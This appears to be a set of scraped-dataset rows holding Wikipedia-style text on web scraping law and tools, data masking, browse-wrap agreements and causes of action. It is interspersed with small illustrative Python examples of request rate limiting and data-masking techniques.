Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter, blocked their IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. [citation needed] In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
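The list of specific anti-bot techniques is truncated in this extract. As a purely illustrative example of one common measure, request-rate limiting, the sketch below implements a minimal sliding-window limiter. The thresholds and the idea of keying on the client IP are assumptions for illustration, not a statement about how any particular server does it.
import time
from collections import defaultdict, deque
MAX_REQUESTS = 60        # assumed limit: at most 60 requests...
WINDOW_SECONDS = 60.0    # ...per rolling 60-second window, per client
_history = defaultdict(deque)   # client IP -> timestamps of its recent requests
def is_allowed(ip, now=None):
    now = time.time() if now is None else now
    q = _history[ip]
    while q and now - q[0] > WINDOW_SECONDS:   # drop requests that fell out of the window
        q.popleft()
    if len(q) >= MAX_REQUESTS:
        return False                           # over the limit: block or throttle this client
    q.append(now)
    return True
# Simulate a burst of 100 rapid requests from one address: only 60 get through.
print(sum(is_allowed("203.0.113.7") for _ in range(100)))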
539 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_masking | Data masking or data obfuscation is the process of modifying sensitive data in such a way that it is of no or little value to unauthorized intruders while still being usable by software or authorized personnel. Data masking can also be referred to as anonymization or tokenization, depending on the context. The main reason to mask data is to protect information that is classified as personally identifiable information or mission-critical data. However, the data must remain usable for the purposes of undertaking valid test cycles. It must also look real and appear consistent. It is more common to have masking applied to data that is represented outside of a corporate production system, in other words, where data is needed for the purpose of application development, building program extensions and conducting various test cycles. It is common practice in enterprise computing to take data from the production systems to fill the data component required for these non-production environments. However, this practice is not always restricted to non-production environments. In some organizations, data that appears on terminal screens to call center operators may have masking dynamically applied based on user security permissions (e.g. preventing call center operators from viewing credit card numbers in billing systems). The primary concern from a corporate governance perspective 1 is that personnel conducting work in these non-production environments are not always security cleared to operate with the information contained in the production data. This practice represents a security hole where data can be copied by unauthorized personnel, and security measures associated with standard production-level controls can be easily bypassed. This represents an access point for a data security breach. Data involved in any data masking or obfuscation must remain meaningful at several levels: Substitution is one of the most effective methods of applying data masking while preserving the authentic look and feel of the data records. It allows the masking to be performed in such a manner that another authentic-looking value can be substituted for the existing value. 2 There are several data field types where this approach provides optimal benefit in disguising whether or not the overall data subset is a masked data set. For example, if dealing with source data which contains customer records, real-life surnames or first names can be randomly substituted from a supplied or customised look-up file. If the first pass of the substitution allows for applying a male first name to all first names, then the second pass would need to allow for applying a female first name to all first names where gender equals "F". Using this approach, we could easily maintain the gender mix within the data structure, apply anonymity to the data records, and also maintain a realistic-looking database that could not easily be identified as a database consisting of masked data. This substitution method needs to be applied for many of the fields that are in database structures across the world, such as telephone numbers, zip codes and postcodes, as well as credit card numbers and other card-type numbers like Social Security numbers and Medicare numbers, where these numbers actually need to conform to a checksum test of the Luhn algorithm.
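A minimal sketch of the substitution approach, plus a Luhn check for card-style numbers, is shown below. The name lists stand in for the "supplied or customised look-up file" mentioned above, and the record and card number are invented test values; none of this reflects any particular masking product.
import random
# Hypothetical look-up lists used as the substitution source.
MALE_NAMES = ["James", "Robert", "Michael", "David"]
FEMALE_NAMES = ["Mary", "Patricia", "Jennifer", "Linda"]
def mask_first_name(gender):
    # Substitute a realistic-looking first name while preserving the gender mix.
    pool = FEMALE_NAMES if gender.upper() == "F" else MALE_NAMES
    return random.choice(pool)
def luhn_valid(number):
    # Check that a card-style number passes the Luhn checksum test.
    digits = [int(d) for d in number if d.isdigit()]
    checksum = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        checksum += d
    return checksum % 10 == 0
record = {"first_name": "Lynne", "gender": "F", "card": "4539578763621486"}  # illustrative values only
masked = dict(record, first_name=mask_first_name(record["gender"]))
print(masked, luhn_valid(masked["card"]))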
In most cases, the substitution files will need to be fairly extensive, so having large substitution datasets, as well as the ability to apply customized data substitution sets, should be a key element of the evaluation criteria for any data masking solution. The shuffling method is a very common form of data obfuscation. It is similar to the substitution method but it derives the substitution set from the same column of data that is being masked. In very simple terms, the data is randomly shuffled within the column. 3 However, if used in isolation, anyone with any knowledge of the original data can then apply a "what if" scenario to the data set and then piece back together a real identity. The shuffling method is also open to being reversed if the shuffling algorithm can be deciphered. citation needed Data shuffling overcomes reservations about using perturbed or modified confidential data because it retains all the desirable properties of perturbation while performing better than other masking techniques in both data utility and disclosure risk. 3 Shuffling, however, has some real strengths in certain areas. If, for instance, the end-of-year figures for financial information are in a test database, one can mask the names of the suppliers and then shuffle the value of the accounts throughout the masked database. It is highly unlikely that anyone, even someone with intimate knowledge of the original data, could derive a true data record back to its original values. The numeric variance method is very useful for applying to financial and date-driven information fields. Effectively, a method utilising this manner of masking can still leave a meaningful range in a financial data set such as payroll. If the variance applied is around 10%, then it is still a very meaningful data set in terms of the ranges of salaries that are paid to the recipients. The same also applies to date information. If the overall data set needs to retain demographic and actuarial data integrity, then applying a random numeric variance of +/- 120 days to date fields would preserve the date distribution, but it would still prevent traceability back to a known entity based on their known actual date of birth or a known date value for whatever record is being masked. Encryption is often the most complex approach to solving the data masking problem. The encryption algorithm often requires that a "key" be applied to view the data based on user rights. This often sounds like the best solution, but in practice the key may then be given out to personnel without the proper rights to view the data. This then defeats the purpose of the masking exercise. Old databases may then get copied with the original credentials of the supplied key and the same uncontrolled problem lives on. Recently, the problem of encrypting data while preserving the properties of the entities has gained recognition and renewed interest among vendors and academia. This new challenge gave rise to algorithms performing format-preserving encryption. These are based on the accepted Advanced Encryption Standard (AES) algorithmic mode recognized by NIST. 4 Sometimes a very simplistic approach to masking is adopted through applying a null value to a particular field. The null value approach is really only useful to prevent visibility of the data element. In almost all cases, it lessens the degree of data integrity that is maintained in the masked data set.
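To make shuffling and numeric variance concrete, here is a small sketch using pandas and NumPy (both already available in this notebook's environment). The table, column names and the 10% variance band are invented for illustration.
import numpy as np
import pandas as pd
# Toy payroll-style table standing in for a real test data set.
df = pd.DataFrame({
    "supplier": ["Acme", "Globex", "Initech", "Umbrella"],
    "account_value": [12000.0, 45000.0, 8700.0, 23000.0],
})
rng = np.random.default_rng(42)
# Shuffling: derive the substitution set from the same column by permuting it,
# so the overall totals and distribution are preserved.
df["account_value_shuffled"] = rng.permutation(df["account_value"].values)
# Numeric variance: nudge each value by up to +/-10%, keeping the range meaningful.
variance = rng.uniform(-0.10, 0.10, size=len(df))
df["account_value_varied"] = (df["account_value"] * (1 + variance)).round(2)
print(df)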
It is not a realistic value and will then fail any application logic validation that may have been applied in the front-end software that is in the system under test. It also highlights to anyone that wishes to reverse engineer any of the identity data that data masking has been applied to some degree on the data set. Character scrambling or masking out of certain fields is another simplistic yet very effective method of preventing sensitive information from being viewed. It is really an extension of the previous method of nulling out, but there is a greater emphasis on keeping the data real and not fully masked altogether. This is commonly applied to credit card data in production systems. For instance, an operator at a call centre might bill an item to a customer's credit card. They then quote a billing reference to the card with only the last four digits shown, e.g. XXXX XXXX XXXX 6789. As an operator, they can see only the last four digits of the card number, but once the billing system passes the customer's details for charging, the full number is revealed to the payment gateway systems. This system is not very effective for test systems, but it is very useful for the billing scenario detailed above. It is also commonly known as a dynamic data masking method. 5 6 Additional rules can also be factored into any masking solution regardless of how the masking methods are constructed. Product-agnostic white papers 7 are a good source of information for exploring some of the more common complex requirements for enterprise masking solutions, which include row-internal synchronization rules, table-internal synchronization rules and table-to-table synchronization rules. 8 Data masking is tightly coupled with building test data. Two major types of data masking are static and on-the-fly data masking. Static data masking is usually performed on the golden copy of the database, but can also be applied to values in other sources, including files. In DB environments, production database administrators will typically load table backups to a separate environment, reduce the dataset to a subset that holds the data necessary for a particular round of testing (a technique called "subsetting"), apply data masking rules while data is in stasis, apply necessary code changes from source control, and/or push data to the desired environment. 9 Deterministic masking is the process of replacing a value in a column with the same substitute value, whether in the same row, the same table, the same database schema or between instances, servers and database types. Example: A database has multiple tables, each with a column that has first names. With deterministic masking, the first name will always be replaced with the same value: “Lynne” will always become “Denise” wherever “Lynne” may be in the database. 10 There are also alternatives to static data masking that rely on stochastic perturbations of the data that preserve some of the statistical properties of the original data. Examples of statistical data obfuscation methods include differential privacy 11 and the DataSifter method. 12 On-the-fly data masking 13 happens in the process of transferring data from environment to environment without data touching the disk on its way. The same technique is applied to "Dynamic Data Masking" but one record at a time. This type of data masking is most useful for environments that do continuous deployments as well as for heavily integrated applications.
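The snippet below sketches both masking out (keeping only the last four digits of a card number) and deterministic masking (the same input always maps to the same substitute, wherever it occurs). The substitute name list and the hash-based mapping are assumptions for illustration, not how any specific product implements determinism.
import hashlib
def mask_card(number):
    # Character masking out: keep only the last four digits.
    digits = [c for c in number if c.isdigit()]
    return "XXXX XXXX XXXX " + "".join(digits[-4:])
# Hypothetical substitution list standing in for a real substitution file.
SUBSTITUTES = ["Denise", "Carol", "Megan", "Ruth", "Alice"]
def mask_first_name_deterministic(name):
    # Deterministic masking: hash the original value to pick a stable substitute,
    # so the same name maps to the same replacement across tables and databases.
    idx = int(hashlib.sha256(name.encode()).hexdigest(), 16) % len(SUBSTITUTES)
    return SUBSTITUTES[idx]
print(mask_card("4539 5787 6362 1486"))        # -> XXXX XXXX XXXX 1486
print(mask_first_name_deterministic("Lynne"))  # same output on every run...
print(mask_first_name_deterministic("Lynne"))  # ...and in every location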
Organizations that employ continuous deployment or continuous delivery practices do not have the time necessary to create a backup and load it to the golden copy of the database. Thus, continuously sending smaller subsets (deltas) of masked testing data from production is important. In heavily integrated applications, developers get feeds from other production systems at the very onset of development, and masking of these feeds is often overlooked and not budgeted until later, making organizations non-compliant. Having on-the-fly data masking in place becomes essential. Dynamic data masking is similar to on-the-fly data masking, but it differs in the sense that on-the-fly data masking is about copying data from one source to another source so that the latter can be shared. Dynamic data masking happens at runtime, dynamically, and on demand, so that there is no need for a second data source in which to store the masked data. Dynamic data masking enables several scenarios, many of which revolve around strict privacy regulations, e.g. those of the Monetary Authority of Singapore or the privacy regulations in Europe. Dynamic data masking is attribute-based and policy-driven. Policies include: Dynamic data masking can also be used to encrypt or decrypt values on the fly, especially when using format-preserving encryption. Several standards have emerged in recent years to implement dynamic data filtering and masking. For instance, XACML policies can be used to mask data inside databases. There are six possible technologies to apply dynamic data masking: In recent years, organizations have increasingly developed their new applications in the cloud, regardless of whether the final applications will be hosted in the cloud or on-premises. Cloud solutions currently allow organizations to use infrastructure as a service, platform as a service, and software as a service. There are various modes of creating test data and moving it from on-premises databases to the cloud, or between different environments within the cloud. Dynamic data masking becomes even more critical in the cloud when customers need to protect PII data while relying on cloud providers to administer their databases. Data masking invariably becomes part of these processes in the systems development life cycle (SDLC), as the development environments' service-level agreements (SLAs) are usually not as stringent as the production environments' SLAs, regardless of whether the application is hosted in the cloud or on-premises. |
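As a minimal sketch of the attribute-based, policy-driven idea, the snippet below leaves the stored value untouched and decides what a caller sees at read time based on their role. The roles, field names and policies are invented for illustration and are not tied to any standard such as XACML.
# Hypothetical role-based masking policies applied at query time.
POLICIES = {
    "call_center": {"credit_card": lambda v: "XXXX XXXX XXXX " + v[-4:]},
    "billing": {},   # billing role sees everything unmasked
}
def read_field(role, field, value):
    # Apply the masker for this role/field if one exists; otherwise return the raw value.
    masker = POLICIES.get(role, {}).get(field)
    return masker(value) if masker else value
row = {"credit_card": "4539578763621486", "name": "Lynne"}
print(read_field("call_center", "credit_card", row["credit_card"]))  # masked view
print(read_field("billing", "credit_card", row["credit_card"]))      # full value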
540 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Browse_wrap | Browsewrap (also browserwrap or browse-wrap license) is a term used in Internet law to refer to a contract or license agreement covering access to or use of materials on a web site or downloadable product. In a browse-wrap agreement, the terms and conditions of use for a website or other downloadable product are posted on the website, typically as a hyperlink at the bottom of the screen. 1 2 Unlike a clickwrap agreement, where the user must manifest assent to the terms and conditions by clicking on an "I agree" box, a browse-wrap agreement does not require this type of express manifestation of assent. 1 Rather, a web-site user purportedly gives their consent simply by using the product, such as by entering the website or downloading software. 1 Browse-wrap agreements, like clickwrap agreements, derive their name by analogy to the "shrink wrap agreements" included inside the sealed packaging of tangible products, where one cannot see the agreement until the product has been purchased or used. 3 Courts that have ruled on the issue have held that the validity of a browse-wrap agreement primarily depends on whether a website user has actual or constructive notice of the terms and conditions prior to using the website or other product. 1 In 2000, in Ticketmaster v. Tickets.com, the court looked at a breach of contract claim where the terms and conditions were situated at the bottom of the home page in "small print". 4 The court ruled for the defendant in this case but did allow Ticketmaster to replead if there were facts showing that the defendant had knowledge of the terms and implicitly agreed to them. In 2002, in Specht v. Netscape, the Second Circuit Court of Appeals looked at the enforceability of a browse-wrap contract entered into on the Netscape website. 3 Users of the site were urged to download free software available on the site by clicking on a tinted button labeled "download". 3 : 22 Only if a user scrolled down the page to the next screen did he come upon an invitation to review the full terms of the program's license agreement, available by hyperlink. 3 : 23 The plaintiffs, who had not seen the agreement, downloaded the software and then were later sued for violations of federal privacy and computer fraud statutes arising from the use of the software. 3 : 23 25 The Second Circuit then noted that an essential ingredient to contract formation is the mutual manifestation of assent. 3 : 29 The court found that "a consumer's clicking on a download button does not communicate assent to contractual terms if the offer did not make clear to the consumer that clicking on the download button would signify assent to those terms." 3 : 29 30 Because the plaintiffs were not put on notice of these terms, they were not bound by them. 3 : 30 32 In 2005, the Illinois Appellate Court ruled in favor of a browse-wrap agreement in Hubbert v. Dell Corp. In this case, consumers of Dell products were repeatedly shown the words "All sales are subject to Dell's Terms and Conditions of Sale", including a conspicuous hyperlink, over a series of pages. The court found that this repeated exposure and visual effect would put a reasonable person on notice of the "terms and conditions". 5 In contrast, in 2014, the United States Court of Appeals for the Ninth Circuit ruled in Nguyen v. Barnes & Noble, Inc.
that Barnes & Noble's 2011 Terms of Use agreement, presented in a browse-wrap manner via hyperlinks alone, was not enforceable since it failed to offer users reasonable notice of the terms. 6 Similarly, in In re Zappos.com, Inc., Customer Data Security Breach Litigation, the United States District Court for the District of Nevada ruled against Zappos.com's browsewrap terms of use, finding that its presentation was not prominent and that no reasonable user would have read the agreement. 7 A browse-wrap agreement can be formed by use of a web page or a hyperlink or small disclaimer on the page. It may only be enforced if the browsing user assents to it. For assent to occur, the browse-wrap agreement should be conspicuous, state that there is an agreement, and provide where it can be located. Courts examine the enforceability of browse-wrap agreements on a case-by-case basis, and there are no "bright-line" rules on whether a given agreement is sufficiently conspicuous. However, based on Specht, some practitioners believe that the icon for the terms-of-use agreement should be placed in the upper left-hand quadrant of the homepage and that all visitors should be channeled through the homepage. The reason for this suggestion is that the court will take judicial notice of the fact that all Internet pages open from the upper left-hand quadrant, and thus the defendant must overcome the presumption that the icon was viewed. Without this presumption, the plaintiff has the burden of proving the defendant did see the icon. 8 |
542 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Cause_of_action | A cause of action or right of action, in law, is a set of facts sufficient to justify suing to obtain money or property, or to justify the enforcement of a legal right against another party. The term also refers to the legal theory upon which a plaintiff brings suit (such as breach of contract, battery, or false imprisonment). The legal document which carries a claim is often called a 'statement of claim' in English law, or a 'complaint' in U.S. federal practice and in many U.S. states. It can be any communication notifying the party to whom it is addressed of an alleged fault which resulted in damages, often expressed in the amount of money the receiving party should pay or reimburse. 1 To pursue a cause of action, a plaintiff pleads or alleges facts in a complaint, the pleading that initiates a lawsuit. A cause of action generally encompasses both the legal theory (the legal wrong the plaintiff claims to have suffered) and the remedy (the relief a court is asked to grant). Often the facts or circumstances that entitle a person to seek judicial relief may create multiple causes of action. Although it is fairly straightforward to file a statement of claim in most jurisdictions, if it is not done properly, then the filing party may lose their case due to simple technicalities. The need to balance procedural expediency against continuity (the technicalities of which one might fall foul) is expressed in procedural rules. There are a number of specific causes of action, including: contract-based actions; statutory causes of action; torts such as assault, battery, invasion of privacy, fraud, slander, negligence, intentional infliction of emotional distress; and suits in equity such as unjust enrichment and quantum meruit. The points a plaintiff must prove to win a given type of case are called the "elements" of that cause of action. For example, for a claim of negligence, the elements are: the (existence of a) duty, breach (of that duty), proximate cause (by that breach), and damages. If a complaint does not allege facts sufficient to support every element of a claim, the court, upon motion by the opposing party, may dismiss the complaint for failure to state a claim for which relief can be granted. The defendant to a cause of action must file an "Answer" to the complaint, in which the claims can be admitted or denied (including denial on the basis of insufficient information in the complaint to form a response). The answer may also contain counterclaims in which the "Counterclaim Plaintiff" states its own causes of action. Finally, the answer may contain affirmative defenses. Most defenses must be raised at the first possible opportunity, either in the answer or by motion, or they are deemed waived. A few defenses, in particular a court's lack of subject matter jurisdiction, need not be pleaded and may be raised at any time. Implied cause of action is a term used in United States statutory and constitutional law for circumstances when a court will determine that a law that creates rights also allows private parties to bring a lawsuit, even though no such remedy is explicitly provided for in the law. Implied causes of action arising under the Constitution of the United States are treated differently from those based on statutes. Perhaps the best known case creating an implied cause of action for constitutional rights is Bivens v. Six Unknown Named Agents, 403 U.S. 388 (1971).
In that case, the United States Supreme Court ruled that an individual whose Fourth Amendment freedom from unreasonable searches and seizures had been violated by federal agents could sue for the violation of the Amendment itself, despite the lack of any federal statute authorizing such a suit. The existence of a remedy for the violation was implied from the importance of the right violated. In a later case, Schweiker v. Chilicky, 487 U.S. 412 (1988), the Supreme Court determined that a cause of action would not be implied for the violation of rights where the U.S. Congress had already provided a remedy for the violation of rights at issue, even if the remedy was inadequate. An implied private right of action is not a cause of action expressly created by a statute. Rather, a court interprets the statute to silently include such a cause of action. Since the 1950s, the United States Supreme Court "has taken three different approaches, each more restrictive than the prior, in deciding when to create private rights of action." 2 In J.I. Case Co. v. Borak (1964), a case under the Securities Exchange Act of 1934, the Court, examining the statute's legislative history and looking at what it believed were the purposes of the statute, held that a private right of action should be implied under Section 14(a) of the Act. 3 Under the circumstances, the Court said, it was "the duty of the courts to be alert to provide such remedies as are necessary to make effective the congressional purpose." 4 In Cort v. Ash (1975), the issue was whether a civil cause of action existed under a criminal statute prohibiting corporations from making contributions to a presidential campaign. The Court said that no such action should be implied, and laid down four factors to be considered in determining whether a statute implicitly included a private right of action: The Supreme Court used the four-part Cort v. Ash test for several years, and in applying the test, for the most part, the Court refused to create causes of action. 6 An important application of the test, however, came in Cannon v. University of Chicago (1979), which recognized an implied private right of action. There, a plaintiff sued under Title IX of the Education Amendments of 1972, which prohibited sex discrimination in any federally funded program. The Court found that the female plaintiff was within the class protected by the statute, that Congress had intended to create a private right of action to enforce the law, that such a right of action was consistent with the remedial purpose Congress had in mind, and that discrimination was a matter of traditionally federal and not state concern. Justice Powell, however, dissented and criticized the Court's approach to implied rights of action, which he said was incompatible with the doctrine of separation of powers. It was the job of Congress, not the federal courts, Justice Powell said, to create causes of action. Therefore, the only appropriate analysis was whether Congress intended to create a private right of action. "Absent the most compelling evidence of affirmative congressional intent, a federal court should not infer a private cause of action." 7 This became a priority for Justice Powell and a battleground for the Court. 8 Borak, which was also applied under the fourth factor in Cort v.
Ash, 9 was singled out by Powell in his Cannon dissent: 8 "although I do not suggest that we should consider overruling Borak at this late date, the lack of precedential support for this decision militates strongly against its extension beyond the facts of the case". Very shortly after Cannon was decided, the Court adopted what legal scholars have called a new approach to the issue in Touche Ross & Co. v. Redington (1979). 10 11 At issue was an implied right under another section of the Securities Exchange Act of 1934, and the Court said that the first three factors mentioned in Cort v. Ash were simply meant to be "relied upon in determining legislative intent." 12 "The ultimate question," the Court concluded, "is one of legislative intent, not one of whether this Court thinks that it can improve upon the statutory scheme that Congress enacted into law." 13 Despite Justice Powell's admonishment of judicial overreach in his Cannon dissent, 14 the Court applied the Cort factor test again in Thompson v. Thompson (1988). 15 In Karahalios v. National Federation of Federal Employees (1989), a unanimous court recognized Cort v. Ash as a test for the implication of private remedies. The Cort v. Ash test has continued to be cited in federal courts, 16 and Justice Neil Gorsuch cited the fourth factor in Rodriguez v. FDIC (2020) to vacate a court of appeals judgment that applied a federal common law test instead of state law. Many states still use the first three Cort factors for their general test for determining whether an implied private cause of action exists under a state statute, including Colorado, 17 Connecticut, 18 Hawaii, 19 Iowa, 20 New York, 21 Pennsylvania, 22 Tennessee, 23 West Virginia, 24 and Washington. 25 Historically, Texas courts had wandered around in a chaotic fashion between the Cort test and a liberal construction test roughly similar to the old Borak test, but in 2004, the Texas Supreme Court overruled both and adopted the textualist Sandoval test. 26 Some states have developed their own tests independently of the Borak, Cort, and Sandoval line of federal cases. For example, prior to 1988, California courts used a vague liberal construction test, under which any statute "embodying a public policy" was privately enforceable by any injured member of the public for whose benefit the statute was enacted. 27 This was most unsatisfactory to conservatives on the Supreme Court of California, such as Associate Justice Frank K. Richardson, who articulated a strict constructionist view in a 1979 dissenting opinion. As Richardson saw it, the Legislature's silence on the issue of whether a cause of action existed to enforce a statute should be interpreted as the Legislature's intent not to create such a cause of action. In November 1986, Chief Justice Rose Bird and two fellow liberal colleagues were ejected from the court by the state's electorate for opposing the death penalty. Bird's replacement, Chief Justice Malcolm M. Lucas, authored an opinion in 1988 that adopted Richardson's strict constructionist view with regard to the interpretation of the California Insurance Code. 28 A 2008 decision by the Court of Appeal 29 and a 2010 decision by the Supreme Court itself 30 finally established that Justice Richardson's strict constructionism as adopted by the Lucas court would retroactively apply to all California statutes. In the 2010 decision in Lu v.
Hawaiian Gardens Casino, Justice Ming Chin wrote for a unanimous court that "we begin with the premise that a violation of a state statute does not necessarily give rise to a private cause of action." 30 |
543 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-27 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. 